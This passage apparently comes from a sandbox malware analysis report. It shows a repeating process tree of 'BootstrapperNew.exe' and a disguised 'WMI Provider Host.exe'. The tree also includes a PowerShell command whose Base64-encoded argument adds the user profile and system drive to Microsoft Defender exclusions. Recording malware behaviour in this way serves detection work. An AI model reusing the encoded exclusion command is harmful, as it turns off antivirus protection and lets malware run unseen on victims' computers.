        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        147⤵
        
        PID:7500
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        148⤵
        
        PID:4748
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        148⤵
        
        PID:7988
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        148⤵
        
        PID:4480
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        149⤵
        
        PID:4348
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        149⤵
        
        PID:4508
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        149⤵
        
        PID:2500
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        150⤵
        
        PID:6660
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        150⤵
        
        PID:536
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        150⤵
        
        PID:6696
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        151⤵
        
        PID:4880
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        151⤵
        
        PID:3088
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        151⤵
        
        PID:5880
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        152⤵
        
        PID:2532
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        152⤵
        
        PID:7328
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        152⤵
        
        PID:4620
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        153⤵
        
        PID:3924
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        153⤵
        
        PID:7132
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        153⤵
        
        PID:4392
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        154⤵
        
        PID:6168
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        154⤵
        
        PID:6176
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        154⤵
        
        PID:7028
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        155⤵
        
        PID:3832
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        155⤵
        
        PID:4176
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        155⤵
        
        PID:6760
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        156⤵
        
        PID:7956
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        156⤵
        
        PID:6732
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        156⤵
        
        PID:4068
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        157⤵
        
        PID:7612
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        157⤵
        
        PID:1396
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        157⤵
        
        PID:4240
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        158⤵
        
        PID:6812
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        158⤵
        
        PID:4260
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        158⤵
        
        PID:4872
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        159⤵
        
        PID:7792
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        159⤵
        
        PID:4956
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        159⤵
        
        PID:3316
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        160⤵
        
        PID:8024
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        160⤵
        
        PID:8036
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        160⤵
        
        PID:5540
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        161⤵
        
        PID:7036
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        161⤵
        
        PID:7528
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        161⤵
        
        PID:3804
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        162⤵
        
        PID:8164
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        162⤵
        
        PID:7608
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        162⤵
        
        PID:4720
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        163⤵
        
        PID:4536
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        163⤵
        
        PID:6432
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        163⤵
        
        PID:6344
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        164⤵
        
        PID:8128
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        164⤵
        
        PID:3320
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        164⤵
        
        PID:3272
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        165⤵
        
        PID:4036
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        165⤵
        
        PID:7724
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        165⤵
        
        PID:7960
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        166⤵
        
        PID:1348
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        166⤵
        
        PID:404
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        166⤵
        
        PID:6872
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        167⤵
        
        PID:2368
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        167⤵
        
        PID:7372
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        167⤵
        
        PID:5228
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        168⤵
        
        PID:5268
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        168⤵
        
        PID:4428
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        168⤵
        
        PID:7032
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        169⤵
        
        PID:1644
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        169⤵
        
        PID:5856
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        169⤵
        
        PID:7564
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        170⤵
        
        PID:7172
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        170⤵
        
        PID:7832
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        170⤵
        
        PID:7312
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        171⤵
        
        PID:6644
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        171⤵
        
        PID:7960
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        171⤵
        
        PID:1464
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        172⤵
        
        PID:6404
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        172⤵
        
        PID:3736
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        172⤵
        
        PID:2916
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        173⤵
        
        PID:6676
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        173⤵
        
        PID:3604
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        173⤵
        
        PID:4996
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        174⤵
        
        PID:400
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        174⤵
        
        PID:6860
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        174⤵
        
        PID:4624
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        175⤵
        
        PID:7848
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        175⤵
        
        PID:1072
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        175⤵
        
        PID:5424
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
